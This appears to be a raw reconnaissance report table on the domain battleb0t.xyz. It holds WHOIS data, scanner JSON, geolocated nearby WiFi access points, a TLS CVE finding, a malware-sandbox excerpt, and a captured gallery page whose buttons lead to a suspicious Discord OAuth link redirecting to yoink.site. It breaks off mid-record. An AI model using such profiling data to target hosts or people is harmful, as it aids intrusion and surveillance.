4c:c6:c8:e5:f1:d8:a7:7b:07:5d:eb:b8:1c:50:a4:a3:8e:f0:
4c:f8:b8:6a:72:59:be:43:0e:8a:de:b5:5e:8f:9e:3f:5a:43:
64:82:cc:e0:de:76:f4:be:a6:12:0a:06:68:bb:77:e1:4c:ef:
4b:4d:67:af:f6:72:c7:6b:1b:9c:48:53:a7:7f:ed:76:18:5c:
f0:f6:c6:4c:24:53:57:57:e1:42:a6:3d:ae:e1:f5:93:f2:6a:
fa:29:72:01:3e:b7:06:f1:2f:1a:0e:91:c5:ec:35:bf:f5:da:
33:95:de:24:12:0d:f5:c3:23:8d:40:82:d1:5c:eb:de:0a:08:
e8:e5:83:e5:0a:8b:3a:5e:98:4e:77:4f:9f:dc:ab:7e:ce:a8:
28:4f:aa:79:4f:c9:be:8f:60:88:6e:6b:f9:20:6c:7f:38:96:
d6:da:d7:11:03:43:d8:b8:51:87:ce:32:22:4d:64:4c:c4:75:
27:d0:e3:df
| 185.199.109.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:34:6B:03) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:44 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29418, United States, North America | 35.229.48.116 |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | http://code.jquery.com/jquery-3.2.1.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:09:01 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.96 | 87.248.157.102 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | scoop.sh | 185.199.110.153 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.167): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:10 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 188.114.97.0/24 |
| 2023-05-12 02:59:45 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: BATTLEBOT.XYZ
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2022-09-05T15:48:14.0Z
Creation Date: 2020-09-07T05:35:36.0Z
Registry Expiry Date: 2023-09-07T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: battlebot.xyz
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-08-08T05:51:35.56Z
Creation Date: 2020-09-07T05:35:36.00Z
Registrar Registration Expiration Date: 2023-09-07T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:59:45.60Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | battlebot.xyz |
| 2023-05-12 03:05:41 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | nuke.battleb0t.xyz |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.237): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:54 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.99 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet2EE2 (Net ID: 00:01:36:5B:2E:E0) | 37.780462,-122.390564 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | www.donation.ecash-pay.com | 165.232.113.85 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:36:56:5A) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | gfycat (Category: misc)
https://gfycat.com/@login | login |
| 2023-05-12 02:45:34 | DNS SPF Record | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | v=spf1 include:_spf.mx.cloudflare.net ~all | battleb0t.xyz |
| 2023-05-12 02:59:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'34.74.170.74', u'104.16.88.20', u'104.21.63.54'], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://www.trustsign.com.br/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"\n "o.ss2.us"\n "ocsp.pki.goog"\n "crl.rootg2.amazontrust.com"\n "crl.pki.goog"\n "crls.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar87F.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_eb4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_eb4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3764"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_eb4_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_eb4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_eb4_IE_EarlyTabStart_0xdd0_Mutex"\n "IsoScope_eb4_ConnHashTable<3764>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3764"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "184.31.135.120:80"\n "142.250.217.72:443"\n "142.250.217.106:443"\n "104.16.88.20:443"\n "108.139.0.36:443"\n "104.21.63.54:443"\n "108.138.245.11:80"\n "142.250.217.99:80"\n "108.138.245.125:80"\n "142.251.33.110:80"\n "108.139.0.48:80"\n "108.138.245.30:80"\n "108.139.0.178:80"\n "216.239.32.178:443"\n "142.250.217.99:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab86E.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': 